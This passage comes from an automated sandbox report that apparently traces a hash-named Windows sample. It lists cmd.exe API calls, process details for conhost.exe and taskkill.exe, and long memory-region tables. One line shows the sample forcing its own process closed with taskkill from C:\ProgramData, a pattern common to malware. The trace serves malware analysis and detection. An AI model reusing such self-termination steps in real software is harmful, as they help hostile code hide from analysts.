ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x345f8d80, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x14748, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcruntime140.dll", cAlternateFileName="VCRUNT~1.DLL")) returned 0 [0139.359] GetLastError () returned 0x12 [0139.359] FindClose (in: hFindFile=0x470b910 | out: hFindFile=0x470b910) returned 1 [0139.359] GetProcessHeap () returned 0x4700000 [0139.359] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470c490) returned 1 [0139.359] GetProcessHeap () returned 0x4700000 [0139.359] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470b8e0) returned 1 [0139.360] GetProcessHeap () returned 0x4700000 [0139.360] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x4707b10) returned 1 [0139.360] GetProcessHeap () returned 0x4700000 [0139.360] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470b8b0) returned 1 [0139.360] GetProcessHeap () returned 0x4700000 [0139.360] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x47089e0) returned 1 [0139.360] GetProcessHeap () returned 0x4700000 [0139.360] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x47087c8) returned 1 [0139.360] GetProcessHeap () returned 0x4700000 [0139.360] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470b650) returned 1 [0139.360] GetProcessHeap () returned 0x4700000 [0139.360] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470b618) returned 1 [0139.360] GetProcessHeap () returned 0x4700000 [0139.360] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470b5d8) returned 1 [0139.360] GetProcessHeap () returned 0x4700000 [0139.360] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470b598) returned 1 [0139.360] GetProcessHeap () returned 0x4700000 [0139.360] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470b558) returned 1 [0139.360] GetConsoleTitleW (in: lpConsoleTitle=0x44ff8f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0139.361] _wcsicmp (_String1="exit", _String2="DIR") returned 1 [0139.361] _wcsicmp (_String1="exit", _String2="ERASE") returned 6 [0139.361] _wcsicmp (_String1="exit", _String2="DEL") returned 1 [0139.361] _wcsicmp (_String1="exit", _String2="TYPE") returned -15 [0139.361] _wcsicmp (_String1="exit", _String2="COPY") returned 2 [0139.361] _wcsicmp (_String1="exit", _String2="CD") returned 2 [0139.362] _wcsicmp (_String1="exit", _String2="CHDIR") returned 2 [0139.362] _wcsicmp (_String1="exit", _String2="RENAME") returned -13 [0139.362] _wcsicmp (_String1="exit", _String2="REN") returned -13 [0139.362] _wcsicmp (_String1="exit", _String2="ECHO") returned 21 [0139.362] _wcsicmp (_String1="exit", _String2="SET") returned -14 [0139.362] _wcsicmp (_String1="exit", _String2="PAUSE") returned -11 [0139.362] _wcsicmp (_String1="exit", _String2="DATE") returned 1 [0139.362] _wcsicmp (_String1="exit", _String2="TIME") returned -15 [0139.362] _wcsicmp (_String1="exit", _String2="PROMPT") returned -11 [0139.362] _wcsicmp (_String1="exit", _String2="MD") returned -8 [0139.362] _wcsicmp (_String1="exit", _String2="MKDIR") returned -8 [0139.362] _wcsicmp (_String1="exit", _String2="RD") returned -13 [0139.362] _wcsicmp (_String1="exit", _String2="RMDIR") returned -13 [0139.362] _wcsicmp (_String1="exit", _String2="PATH") returned -11 [0139.362] _wcsicmp (_String1="exit", _String2="GOTO") returned -2 [0139.362] _wcsicmp (_String1="exit", _String2="SHIFT") returned -14 [0139.362] _wcsicmp (_String1="exit", _String2="CLS") returned 2 [0139.362] _wcsicmp (_String1="exit", _String2="CALL") returned 2 [0139.362] _wcsicmp (_String1="exit", _String2="VERIFY") returned -17 [0139.362] _wcsicmp (_String1="exit", _String2="VER") returned -17 [0139.362] _wcsicmp (_String1="exit", _String2="VOL") returned -17 [0139.362] _wcsicmp (_String1="exit", _String2="EXIT") returned 0 [0139.362] GetProcessHeap () returned 0x4700000 [0139.362] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xc) returned 0x47086a8 [0139.362] GetProcessHeap () returned 0x4700000 [0139.362] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x12) returned 0x4707bf0 [0139.362] exit (_Code=0) Thread: id = 48 os_tid = 0x798 Process: id = "18" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x501bc000" os_pid = "0xf18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0x4d8" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2627 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2628 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2629 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2630 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2631 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2632 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2633 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2634 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2635 start_va = 0x7ff7a29a0000 end_va = 0x7ff7a29b0fff monitored = 0 entry_point = 0x7ff7a29a16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2636 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2637 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 2638 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2639 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2640 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2641 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2642 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2643 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2644 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2645 start_va = 0x600000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2646 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2647 start_va = 0x7ffb1cba0000 end_va = 0x7ffb1cbf8fff monitored = 0 entry_point = 0x7ffb1cbafbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2648 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 2649 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2650 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2651 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2652 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2653 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2654 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2655 start_va = 0x7ffb281e0000 end_va = 0x7ffb28322fff monitored = 0 entry_point = 0x7ffb28208210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2656 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2657 start_va = 0x7ffb261f0000 end_va = 0x7ffb2622afff monitored = 0 entry_point = 0x7ffb261f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2658 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2659 start_va = 0x7ffb23670000 end_va = 0x7ffb237f5fff monitored = 0 entry_point = 0x7ffb236bd700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2660 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2661 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2662 start_va = 0x8e0000 end_va = 0xa67fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 2663 start_va = 0xa70000 end_va = 0xbf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 2664 start_va = 0xc00000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c00000" filename = "" Region: id = 2665 start_va = 0x690000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2666 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2667 start_va = 0x680000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 2668 start_va = 0x7ffb267e0000 end_va = 0x7ffb27d3efff monitored = 0 entry_point = 0x7ffb269411f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2669 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2670 start_va = 0x7ffb25850000 end_va = 0x7ffb25e93fff monitored = 0 entry_point = 0x7ffb25a164b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2671 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2672 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2673 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2674 start_va = 0x7ffb256b0000 end_va = 0x7ffb25764fff monitored = 0 entry_point = 0x7ffb256f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2675 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2676 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2677 start_va = 0x7ffb23aa0000 end_va = 0x7ffb23b35fff monitored = 0 entry_point = 0x7ffb23ac5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2678 start_va = 0x2000000 end_va = 0x20affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 2679 start_va = 0x20b0000 end_va = 0x23e6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2680 start_va = 0x50000 end_va = 0x51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2681 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2682 start_va = 0x1d0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 2683 start_va = 0x690000 end_va = 0x6e9fff monitored = 1 entry_point = 0x6a53f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 2684 start_va = 0x730000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 2685 start_va = 0x23f0000 end_va = 0x2603fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 2686 start_va = 0x2610000 end_va = 0x282efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 2687 start_va = 0x2830000 end_va = 0x293afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002830000" filename = "" Region: id = 2688 start_va = 0x2940000 end_va = 0x2b51fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002940000" filename = "" Region: id = 2689 start_va = 0x2b60000 end_va = 0x2c68fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b60000" filename = "" Region: id = 2690 start_va = 0x640000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2691 start_va = 0x7ffb28080000 end_va = 0x7ffb281d9fff monitored = 0 entry_point = 0x7ffb280c38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2692 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2693 start_va = 0x2c70000 end_va = 0x2d2bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c70000" filename = "" Region: id = 2694 start_va = 0x70000 end_va = 0x73fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2695 start_va = 0x7ffb229b0000 end_va = 0x7ffb229d1fff monitored = 0 entry_point = 0x7ffb229b1a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 2696 start_va = 0x7ffb23860000 end_va = 0x7ffb23872fff monitored = 0 entry_point = 0x7ffb23862760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2697 start_va = 0x7ffb24f30000 end_va = 0x7ffb24f85fff monitored = 0 entry_point = 0x7ffb24f40bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2698 start_va = 0x80000 end_va = 0x86fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 2699 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2700 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2701 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 2702 start_va = 0x690000 end_va = 0x690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 2703 start_va = 0x6a0000 end_va = 0x6a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 2704 start_va = 0x7ffb1c1d0000 end_va = 0x7ffb1c443fff monitored = 0 entry_point = 0x7ffb1c240400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 2705 start_va = 0x6b0000 end_va = 0x6b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2706 start_va = 0x6c0000 end_va = 0x6c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Thread: id = 44 os_tid = 0xac8 Thread: id = 45 os_tid = 0x12b8 Thread: id = 46 os_tid = 0xc3c Thread: id = 47 os_tid = 0x794 Process: id = "19" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x33f20000" os_pid = "0xf88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0x4d8" cmd_line = "taskkill /im f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe /f " cur_dir = "C:\\ProgramData\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2724 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2725 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2726 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2727 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2728 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2729 start_va = 0xe0000 end_va = 0xf5fff monitored = 0 entry_point = 0xede80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 2730 start_va = 0x100000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 2731 start_va = 0x4100000 end_va = 0x4103fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004100000" filename = "" Region: id = 2732 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 2733 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 2734 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 2735 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2736 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2737 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2738 start_va = 0x7fff0000 end_va = 0x7dfb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2739 start_va = 0x7dfb28b00000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfb28b00000" filename = "" Region: id = 2740 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2741 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 2742 start_va = 0x4170000 end_va = 0x417ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004170000" filename = "" Region: id = 2743 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2744 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2745 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2746 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2747 start_va = 0x4400000 end_va = 0x458ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 2748 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2749 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2750 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2751 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2752 start_va = 0x4590000 end_va = 0x464dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2753 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2754 start_va = 0x77820000 end_va = 0x7789afff monitored = 0 entry_point = 0x7783e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2755 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2756 start_va = 0x4130000 end_va = 0x416ffff monitored = 1 entry_point = 0x0 region_type = private name = 